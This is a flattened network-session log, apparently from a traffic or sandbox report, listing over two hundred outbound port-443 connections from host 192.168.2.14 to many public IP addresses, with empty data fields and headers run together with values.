                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9893192.168.2.1448568126.207.41.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9894192.168.2.145731225.133.122.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9895192.168.2.144829070.93.194.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9896192.168.2.1457932144.203.53.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9897192.168.2.145473639.48.205.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9898192.168.2.1454732186.252.14.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9899192.168.2.1442238157.210.171.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9900192.168.2.1450030186.225.128.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9901192.168.2.1439576104.158.206.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9902192.168.2.1452004146.58.179.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9903192.168.2.145635019.73.228.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9904192.168.2.145868635.113.211.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9905192.168.2.1440622104.98.99.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9906192.168.2.1442582165.17.231.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9907192.168.2.1452036161.153.156.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9908192.168.2.145028684.156.151.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9909192.168.2.1451540118.87.190.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9910192.168.2.1458440212.32.50.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9911192.168.2.1456920108.49.134.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9912192.168.2.144239627.138.112.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9913192.168.2.1443738186.133.158.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9914192.168.2.1447378190.131.210.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9915192.168.2.1450102107.220.241.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9916192.168.2.145914696.6.31.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9917192.168.2.145308846.250.152.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9918192.168.2.1438596137.31.207.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9919192.168.2.145028090.31.120.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9920192.168.2.144109048.92.120.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9921192.168.2.145193499.5.146.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9922192.168.2.1434516152.43.61.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9923192.168.2.1459302116.55.112.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9924192.168.2.1435106187.3.244.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9925192.168.2.143784291.107.13.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9926192.168.2.1458442168.59.1.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9927192.168.2.1440270154.154.80.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9928192.168.2.1438108107.118.247.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9929192.168.2.145419293.182.35.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9930192.168.2.144781895.134.130.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9931192.168.2.1449846133.103.12.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9932192.168.2.145387083.78.206.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9933192.168.2.1441120217.97.53.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9934192.168.2.1437706217.75.236.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9935192.168.2.1438604102.2.79.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9936192.168.2.1436260207.182.155.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9937192.168.2.1453248220.252.248.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9938192.168.2.1443444138.102.104.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9939192.168.2.1441410204.110.82.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9940192.168.2.1448756131.201.10.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9941192.168.2.144619450.252.2.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9942192.168.2.146039083.101.160.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9943192.168.2.144115674.133.254.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9944192.168.2.1436088199.117.98.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9945192.168.2.145472451.147.55.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9946192.168.2.145708852.39.202.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9947192.168.2.1444370137.188.104.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9948192.168.2.143913414.113.106.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9949192.168.2.1450690179.34.202.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9950192.168.2.1441184223.60.216.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9951192.168.2.143780091.213.253.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9952192.168.2.1438436131.15.19.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9953192.168.2.1445944179.99.187.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9954192.168.2.1441108206.99.163.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9955192.168.2.144720052.199.215.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9956192.168.2.1435544131.181.58.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9957192.168.2.144544690.172.134.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9958192.168.2.1457434124.147.237.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9959192.168.2.144286812.183.103.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9960192.168.2.1451838123.42.83.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9961192.168.2.145234832.71.153.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9962192.168.2.145769618.213.56.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9963192.168.2.1460818169.104.198.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9964192.168.2.1445200178.99.107.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9965192.168.2.1450062107.72.84.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9966192.168.2.143575646.93.90.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9967192.168.2.1452720180.78.44.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9968192.168.2.1438932180.15.84.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9969192.168.2.1456494221.156.118.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9970192.168.2.145897851.138.137.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9971192.168.2.1447568210.5.209.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9972192.168.2.1435354186.132.161.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9973192.168.2.14420245.174.138.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9974192.168.2.1459234192.125.203.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9975192.168.2.1437396116.212.129.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9976192.168.2.144082438.100.96.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9977192.168.2.14478968.36.123.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9978192.168.2.144569894.242.223.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9979192.168.2.1457544190.37.170.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9980192.168.2.1439546150.153.165.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9981192.168.2.14580262.114.185.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9982192.168.2.1446074213.130.52.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9983192.168.2.144623890.221.93.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9984192.168.2.1442758126.89.94.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9985192.168.2.1449356202.110.104.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9986192.168.2.14583005.253.216.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9987192.168.2.1442954131.224.21.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9988192.168.2.1459090107.130.12.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9989192.168.2.144267418.225.44.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9990192.168.2.1443358152.181.139.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9991192.168.2.1449074161.67.175.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9992192.168.2.14412161.236.67.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9993192.168.2.1452600189.115.82.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9994192.168.2.1447250125.231.50.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9995192.168.2.14445542.76.47.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9996192.168.2.1453650142.170.17.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9997192.168.2.1441824124.10.7.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9998192.168.2.14390785.25.250.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9999192.168.2.1455512146.228.76.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10000192.168.2.1453078200.114.222.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10001192.168.2.1459884212.34.173.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10002192.168.2.1450222171.142.254.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10003192.168.2.1437382134.162.92.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10004192.168.2.1451994218.225.240.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10005192.168.2.1454196181.48.127.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10006192.168.2.145523049.246.41.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10007192.168.2.1446898192.54.104.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10008192.168.2.1439202216.26.140.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10009192.168.2.1450924192.104.157.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10010192.168.2.1448412111.238.228.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10011192.168.2.1442726158.80.17.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10012192.168.2.1456542207.144.98.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10013192.168.2.143929099.122.135.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10014192.168.2.143455479.235.92.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10015192.168.2.1457980216.227.242.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10016192.168.2.1452404106.44.136.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10017192.168.2.143395653.114.15.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10018192.168.2.1456276207.83.190.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10019192.168.2.145133045.154.15.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10020192.168.2.1454578175.17.114.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10021192.168.2.143469872.22.18.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10022192.168.2.1442944126.47.162.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10023192.168.2.1451868118.15.84.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10024192.168.2.1444038161.24.236.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10025192.168.2.144080276.13.90.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10026192.168.2.1432858202.221.64.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10027192.168.2.1437368151.96.95.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10028192.168.2.14415302.157.87.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10029192.168.2.1442912121.58.176.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10030192.168.2.1449592159.45.190.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10031192.168.2.145931895.212.20.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10032192.168.2.1450916126.79.213.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10033192.168.2.1436226209.80.152.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10034192.168.2.1460470119.98.2.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10035192.168.2.1439712192.81.65.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10036192.168.2.1436850191.141.142.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10037192.168.2.1440022196.159.111.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10038192.168.2.143820246.97.23.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10039192.168.2.143348032.144.113.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10040192.168.2.1456504210.10.125.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10041192.168.2.1444488150.147.149.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10042192.168.2.143900692.185.6.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10043192.168.2.144310218.197.26.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10044192.168.2.1447346154.219.241.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10045192.168.2.1437006121.252.90.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10046192.168.2.143542645.219.132.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10047192.168.2.1437358222.226.206.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10048192.168.2.143476612.132.120.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10049192.168.2.1441054207.5.189.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10050192.168.2.145939064.24.222.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10051192.168.2.1457898209.169.129.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10052192.168.2.1441184210.14.195.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10053192.168.2.144248034.212.245.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10054192.168.2.1445644156.34.174.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10055192.168.2.1451908170.44.205.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10056192.168.2.1452396145.32.63.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10057192.168.2.145916660.149.202.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10058192.168.2.1455104221.162.51.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10059192.168.2.143828897.215.214.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10060192.168.2.1450768119.18.68.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10061192.168.2.1439130172.122.26.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10062192.168.2.145188487.22.197.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10063192.168.2.1459622190.128.74.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10064192.168.2.1440076189.204.169.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10065192.168.2.144666896.34.215.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10066192.168.2.1441264146.150.159.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10067192.168.2.1436336195.253.233.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10068192.168.2.143409037.17.140.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10069192.168.2.1441818146.203.229.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10070192.168.2.1452156115.171.99.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10071192.168.2.1458892149.171.128.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10072192.168.2.1438962154.34.186.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10073192.168.2.1460888156.99.247.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10074192.168.2.1456228143.39.138.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10075192.168.2.1446496156.228.227.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10076192.168.2.144558254.136.21.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10077192.168.2.145893092.201.47.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10078192.168.2.143547814.207.43.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10079192.168.2.1453120122.8.15.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10080192.168.2.1447280100.204.250.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10081192.168.2.1440964204.214.226.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10082192.168.2.1449990184.44.74.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10083192.168.2.1451728110.120.224.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10084192.168.2.1442764181.113.60.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10085192.168.2.145015872.209.197.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10086192.168.2.1439074162.209.43.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10087192.168.2.143498052.201.119.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10088192.168.2.1437086160.226.213.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10089192.168.2.143487614.231.32.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10090192.168.2.144049242.175.63.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10091192.168.2.1441816133.106.244.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10092192.168.2.1457880118.162.99.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10093192.168.2.1451914143.0.146.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10094192.168.2.1454406113.84.112.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10095192.168.2.1438588138.230.164.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10096192.168.2.143918669.205.84.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10097192.168.2.143324275.136.164.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10098192.168.2.1433294123.26.174.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10099192.168.2.143476085.141.186.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10100192.168.2.1434312184.188.214.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10101192.168.2.145507682.168.13.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10102192.168.2.1434014142.137.208.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10103192.168.2.143547612.111.237.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10104192.168.2.145826672.12.96.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10105192.168.2.1447742133.107.208.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10106192.168.2.1435136208.129.87.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10107192.168.2.144732823.238.10.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10108192.168.2.144677296.113.64.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10109192.168.2.143941244.160.223.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10110192.168.2.1437544120.133.243.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10111192.168.2.1452846117.30.235.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10112192.168.2.1447780154.220.51.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10113192.168.2.145431899.202.94.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10114192.168.2.1449258206.106.20.26443
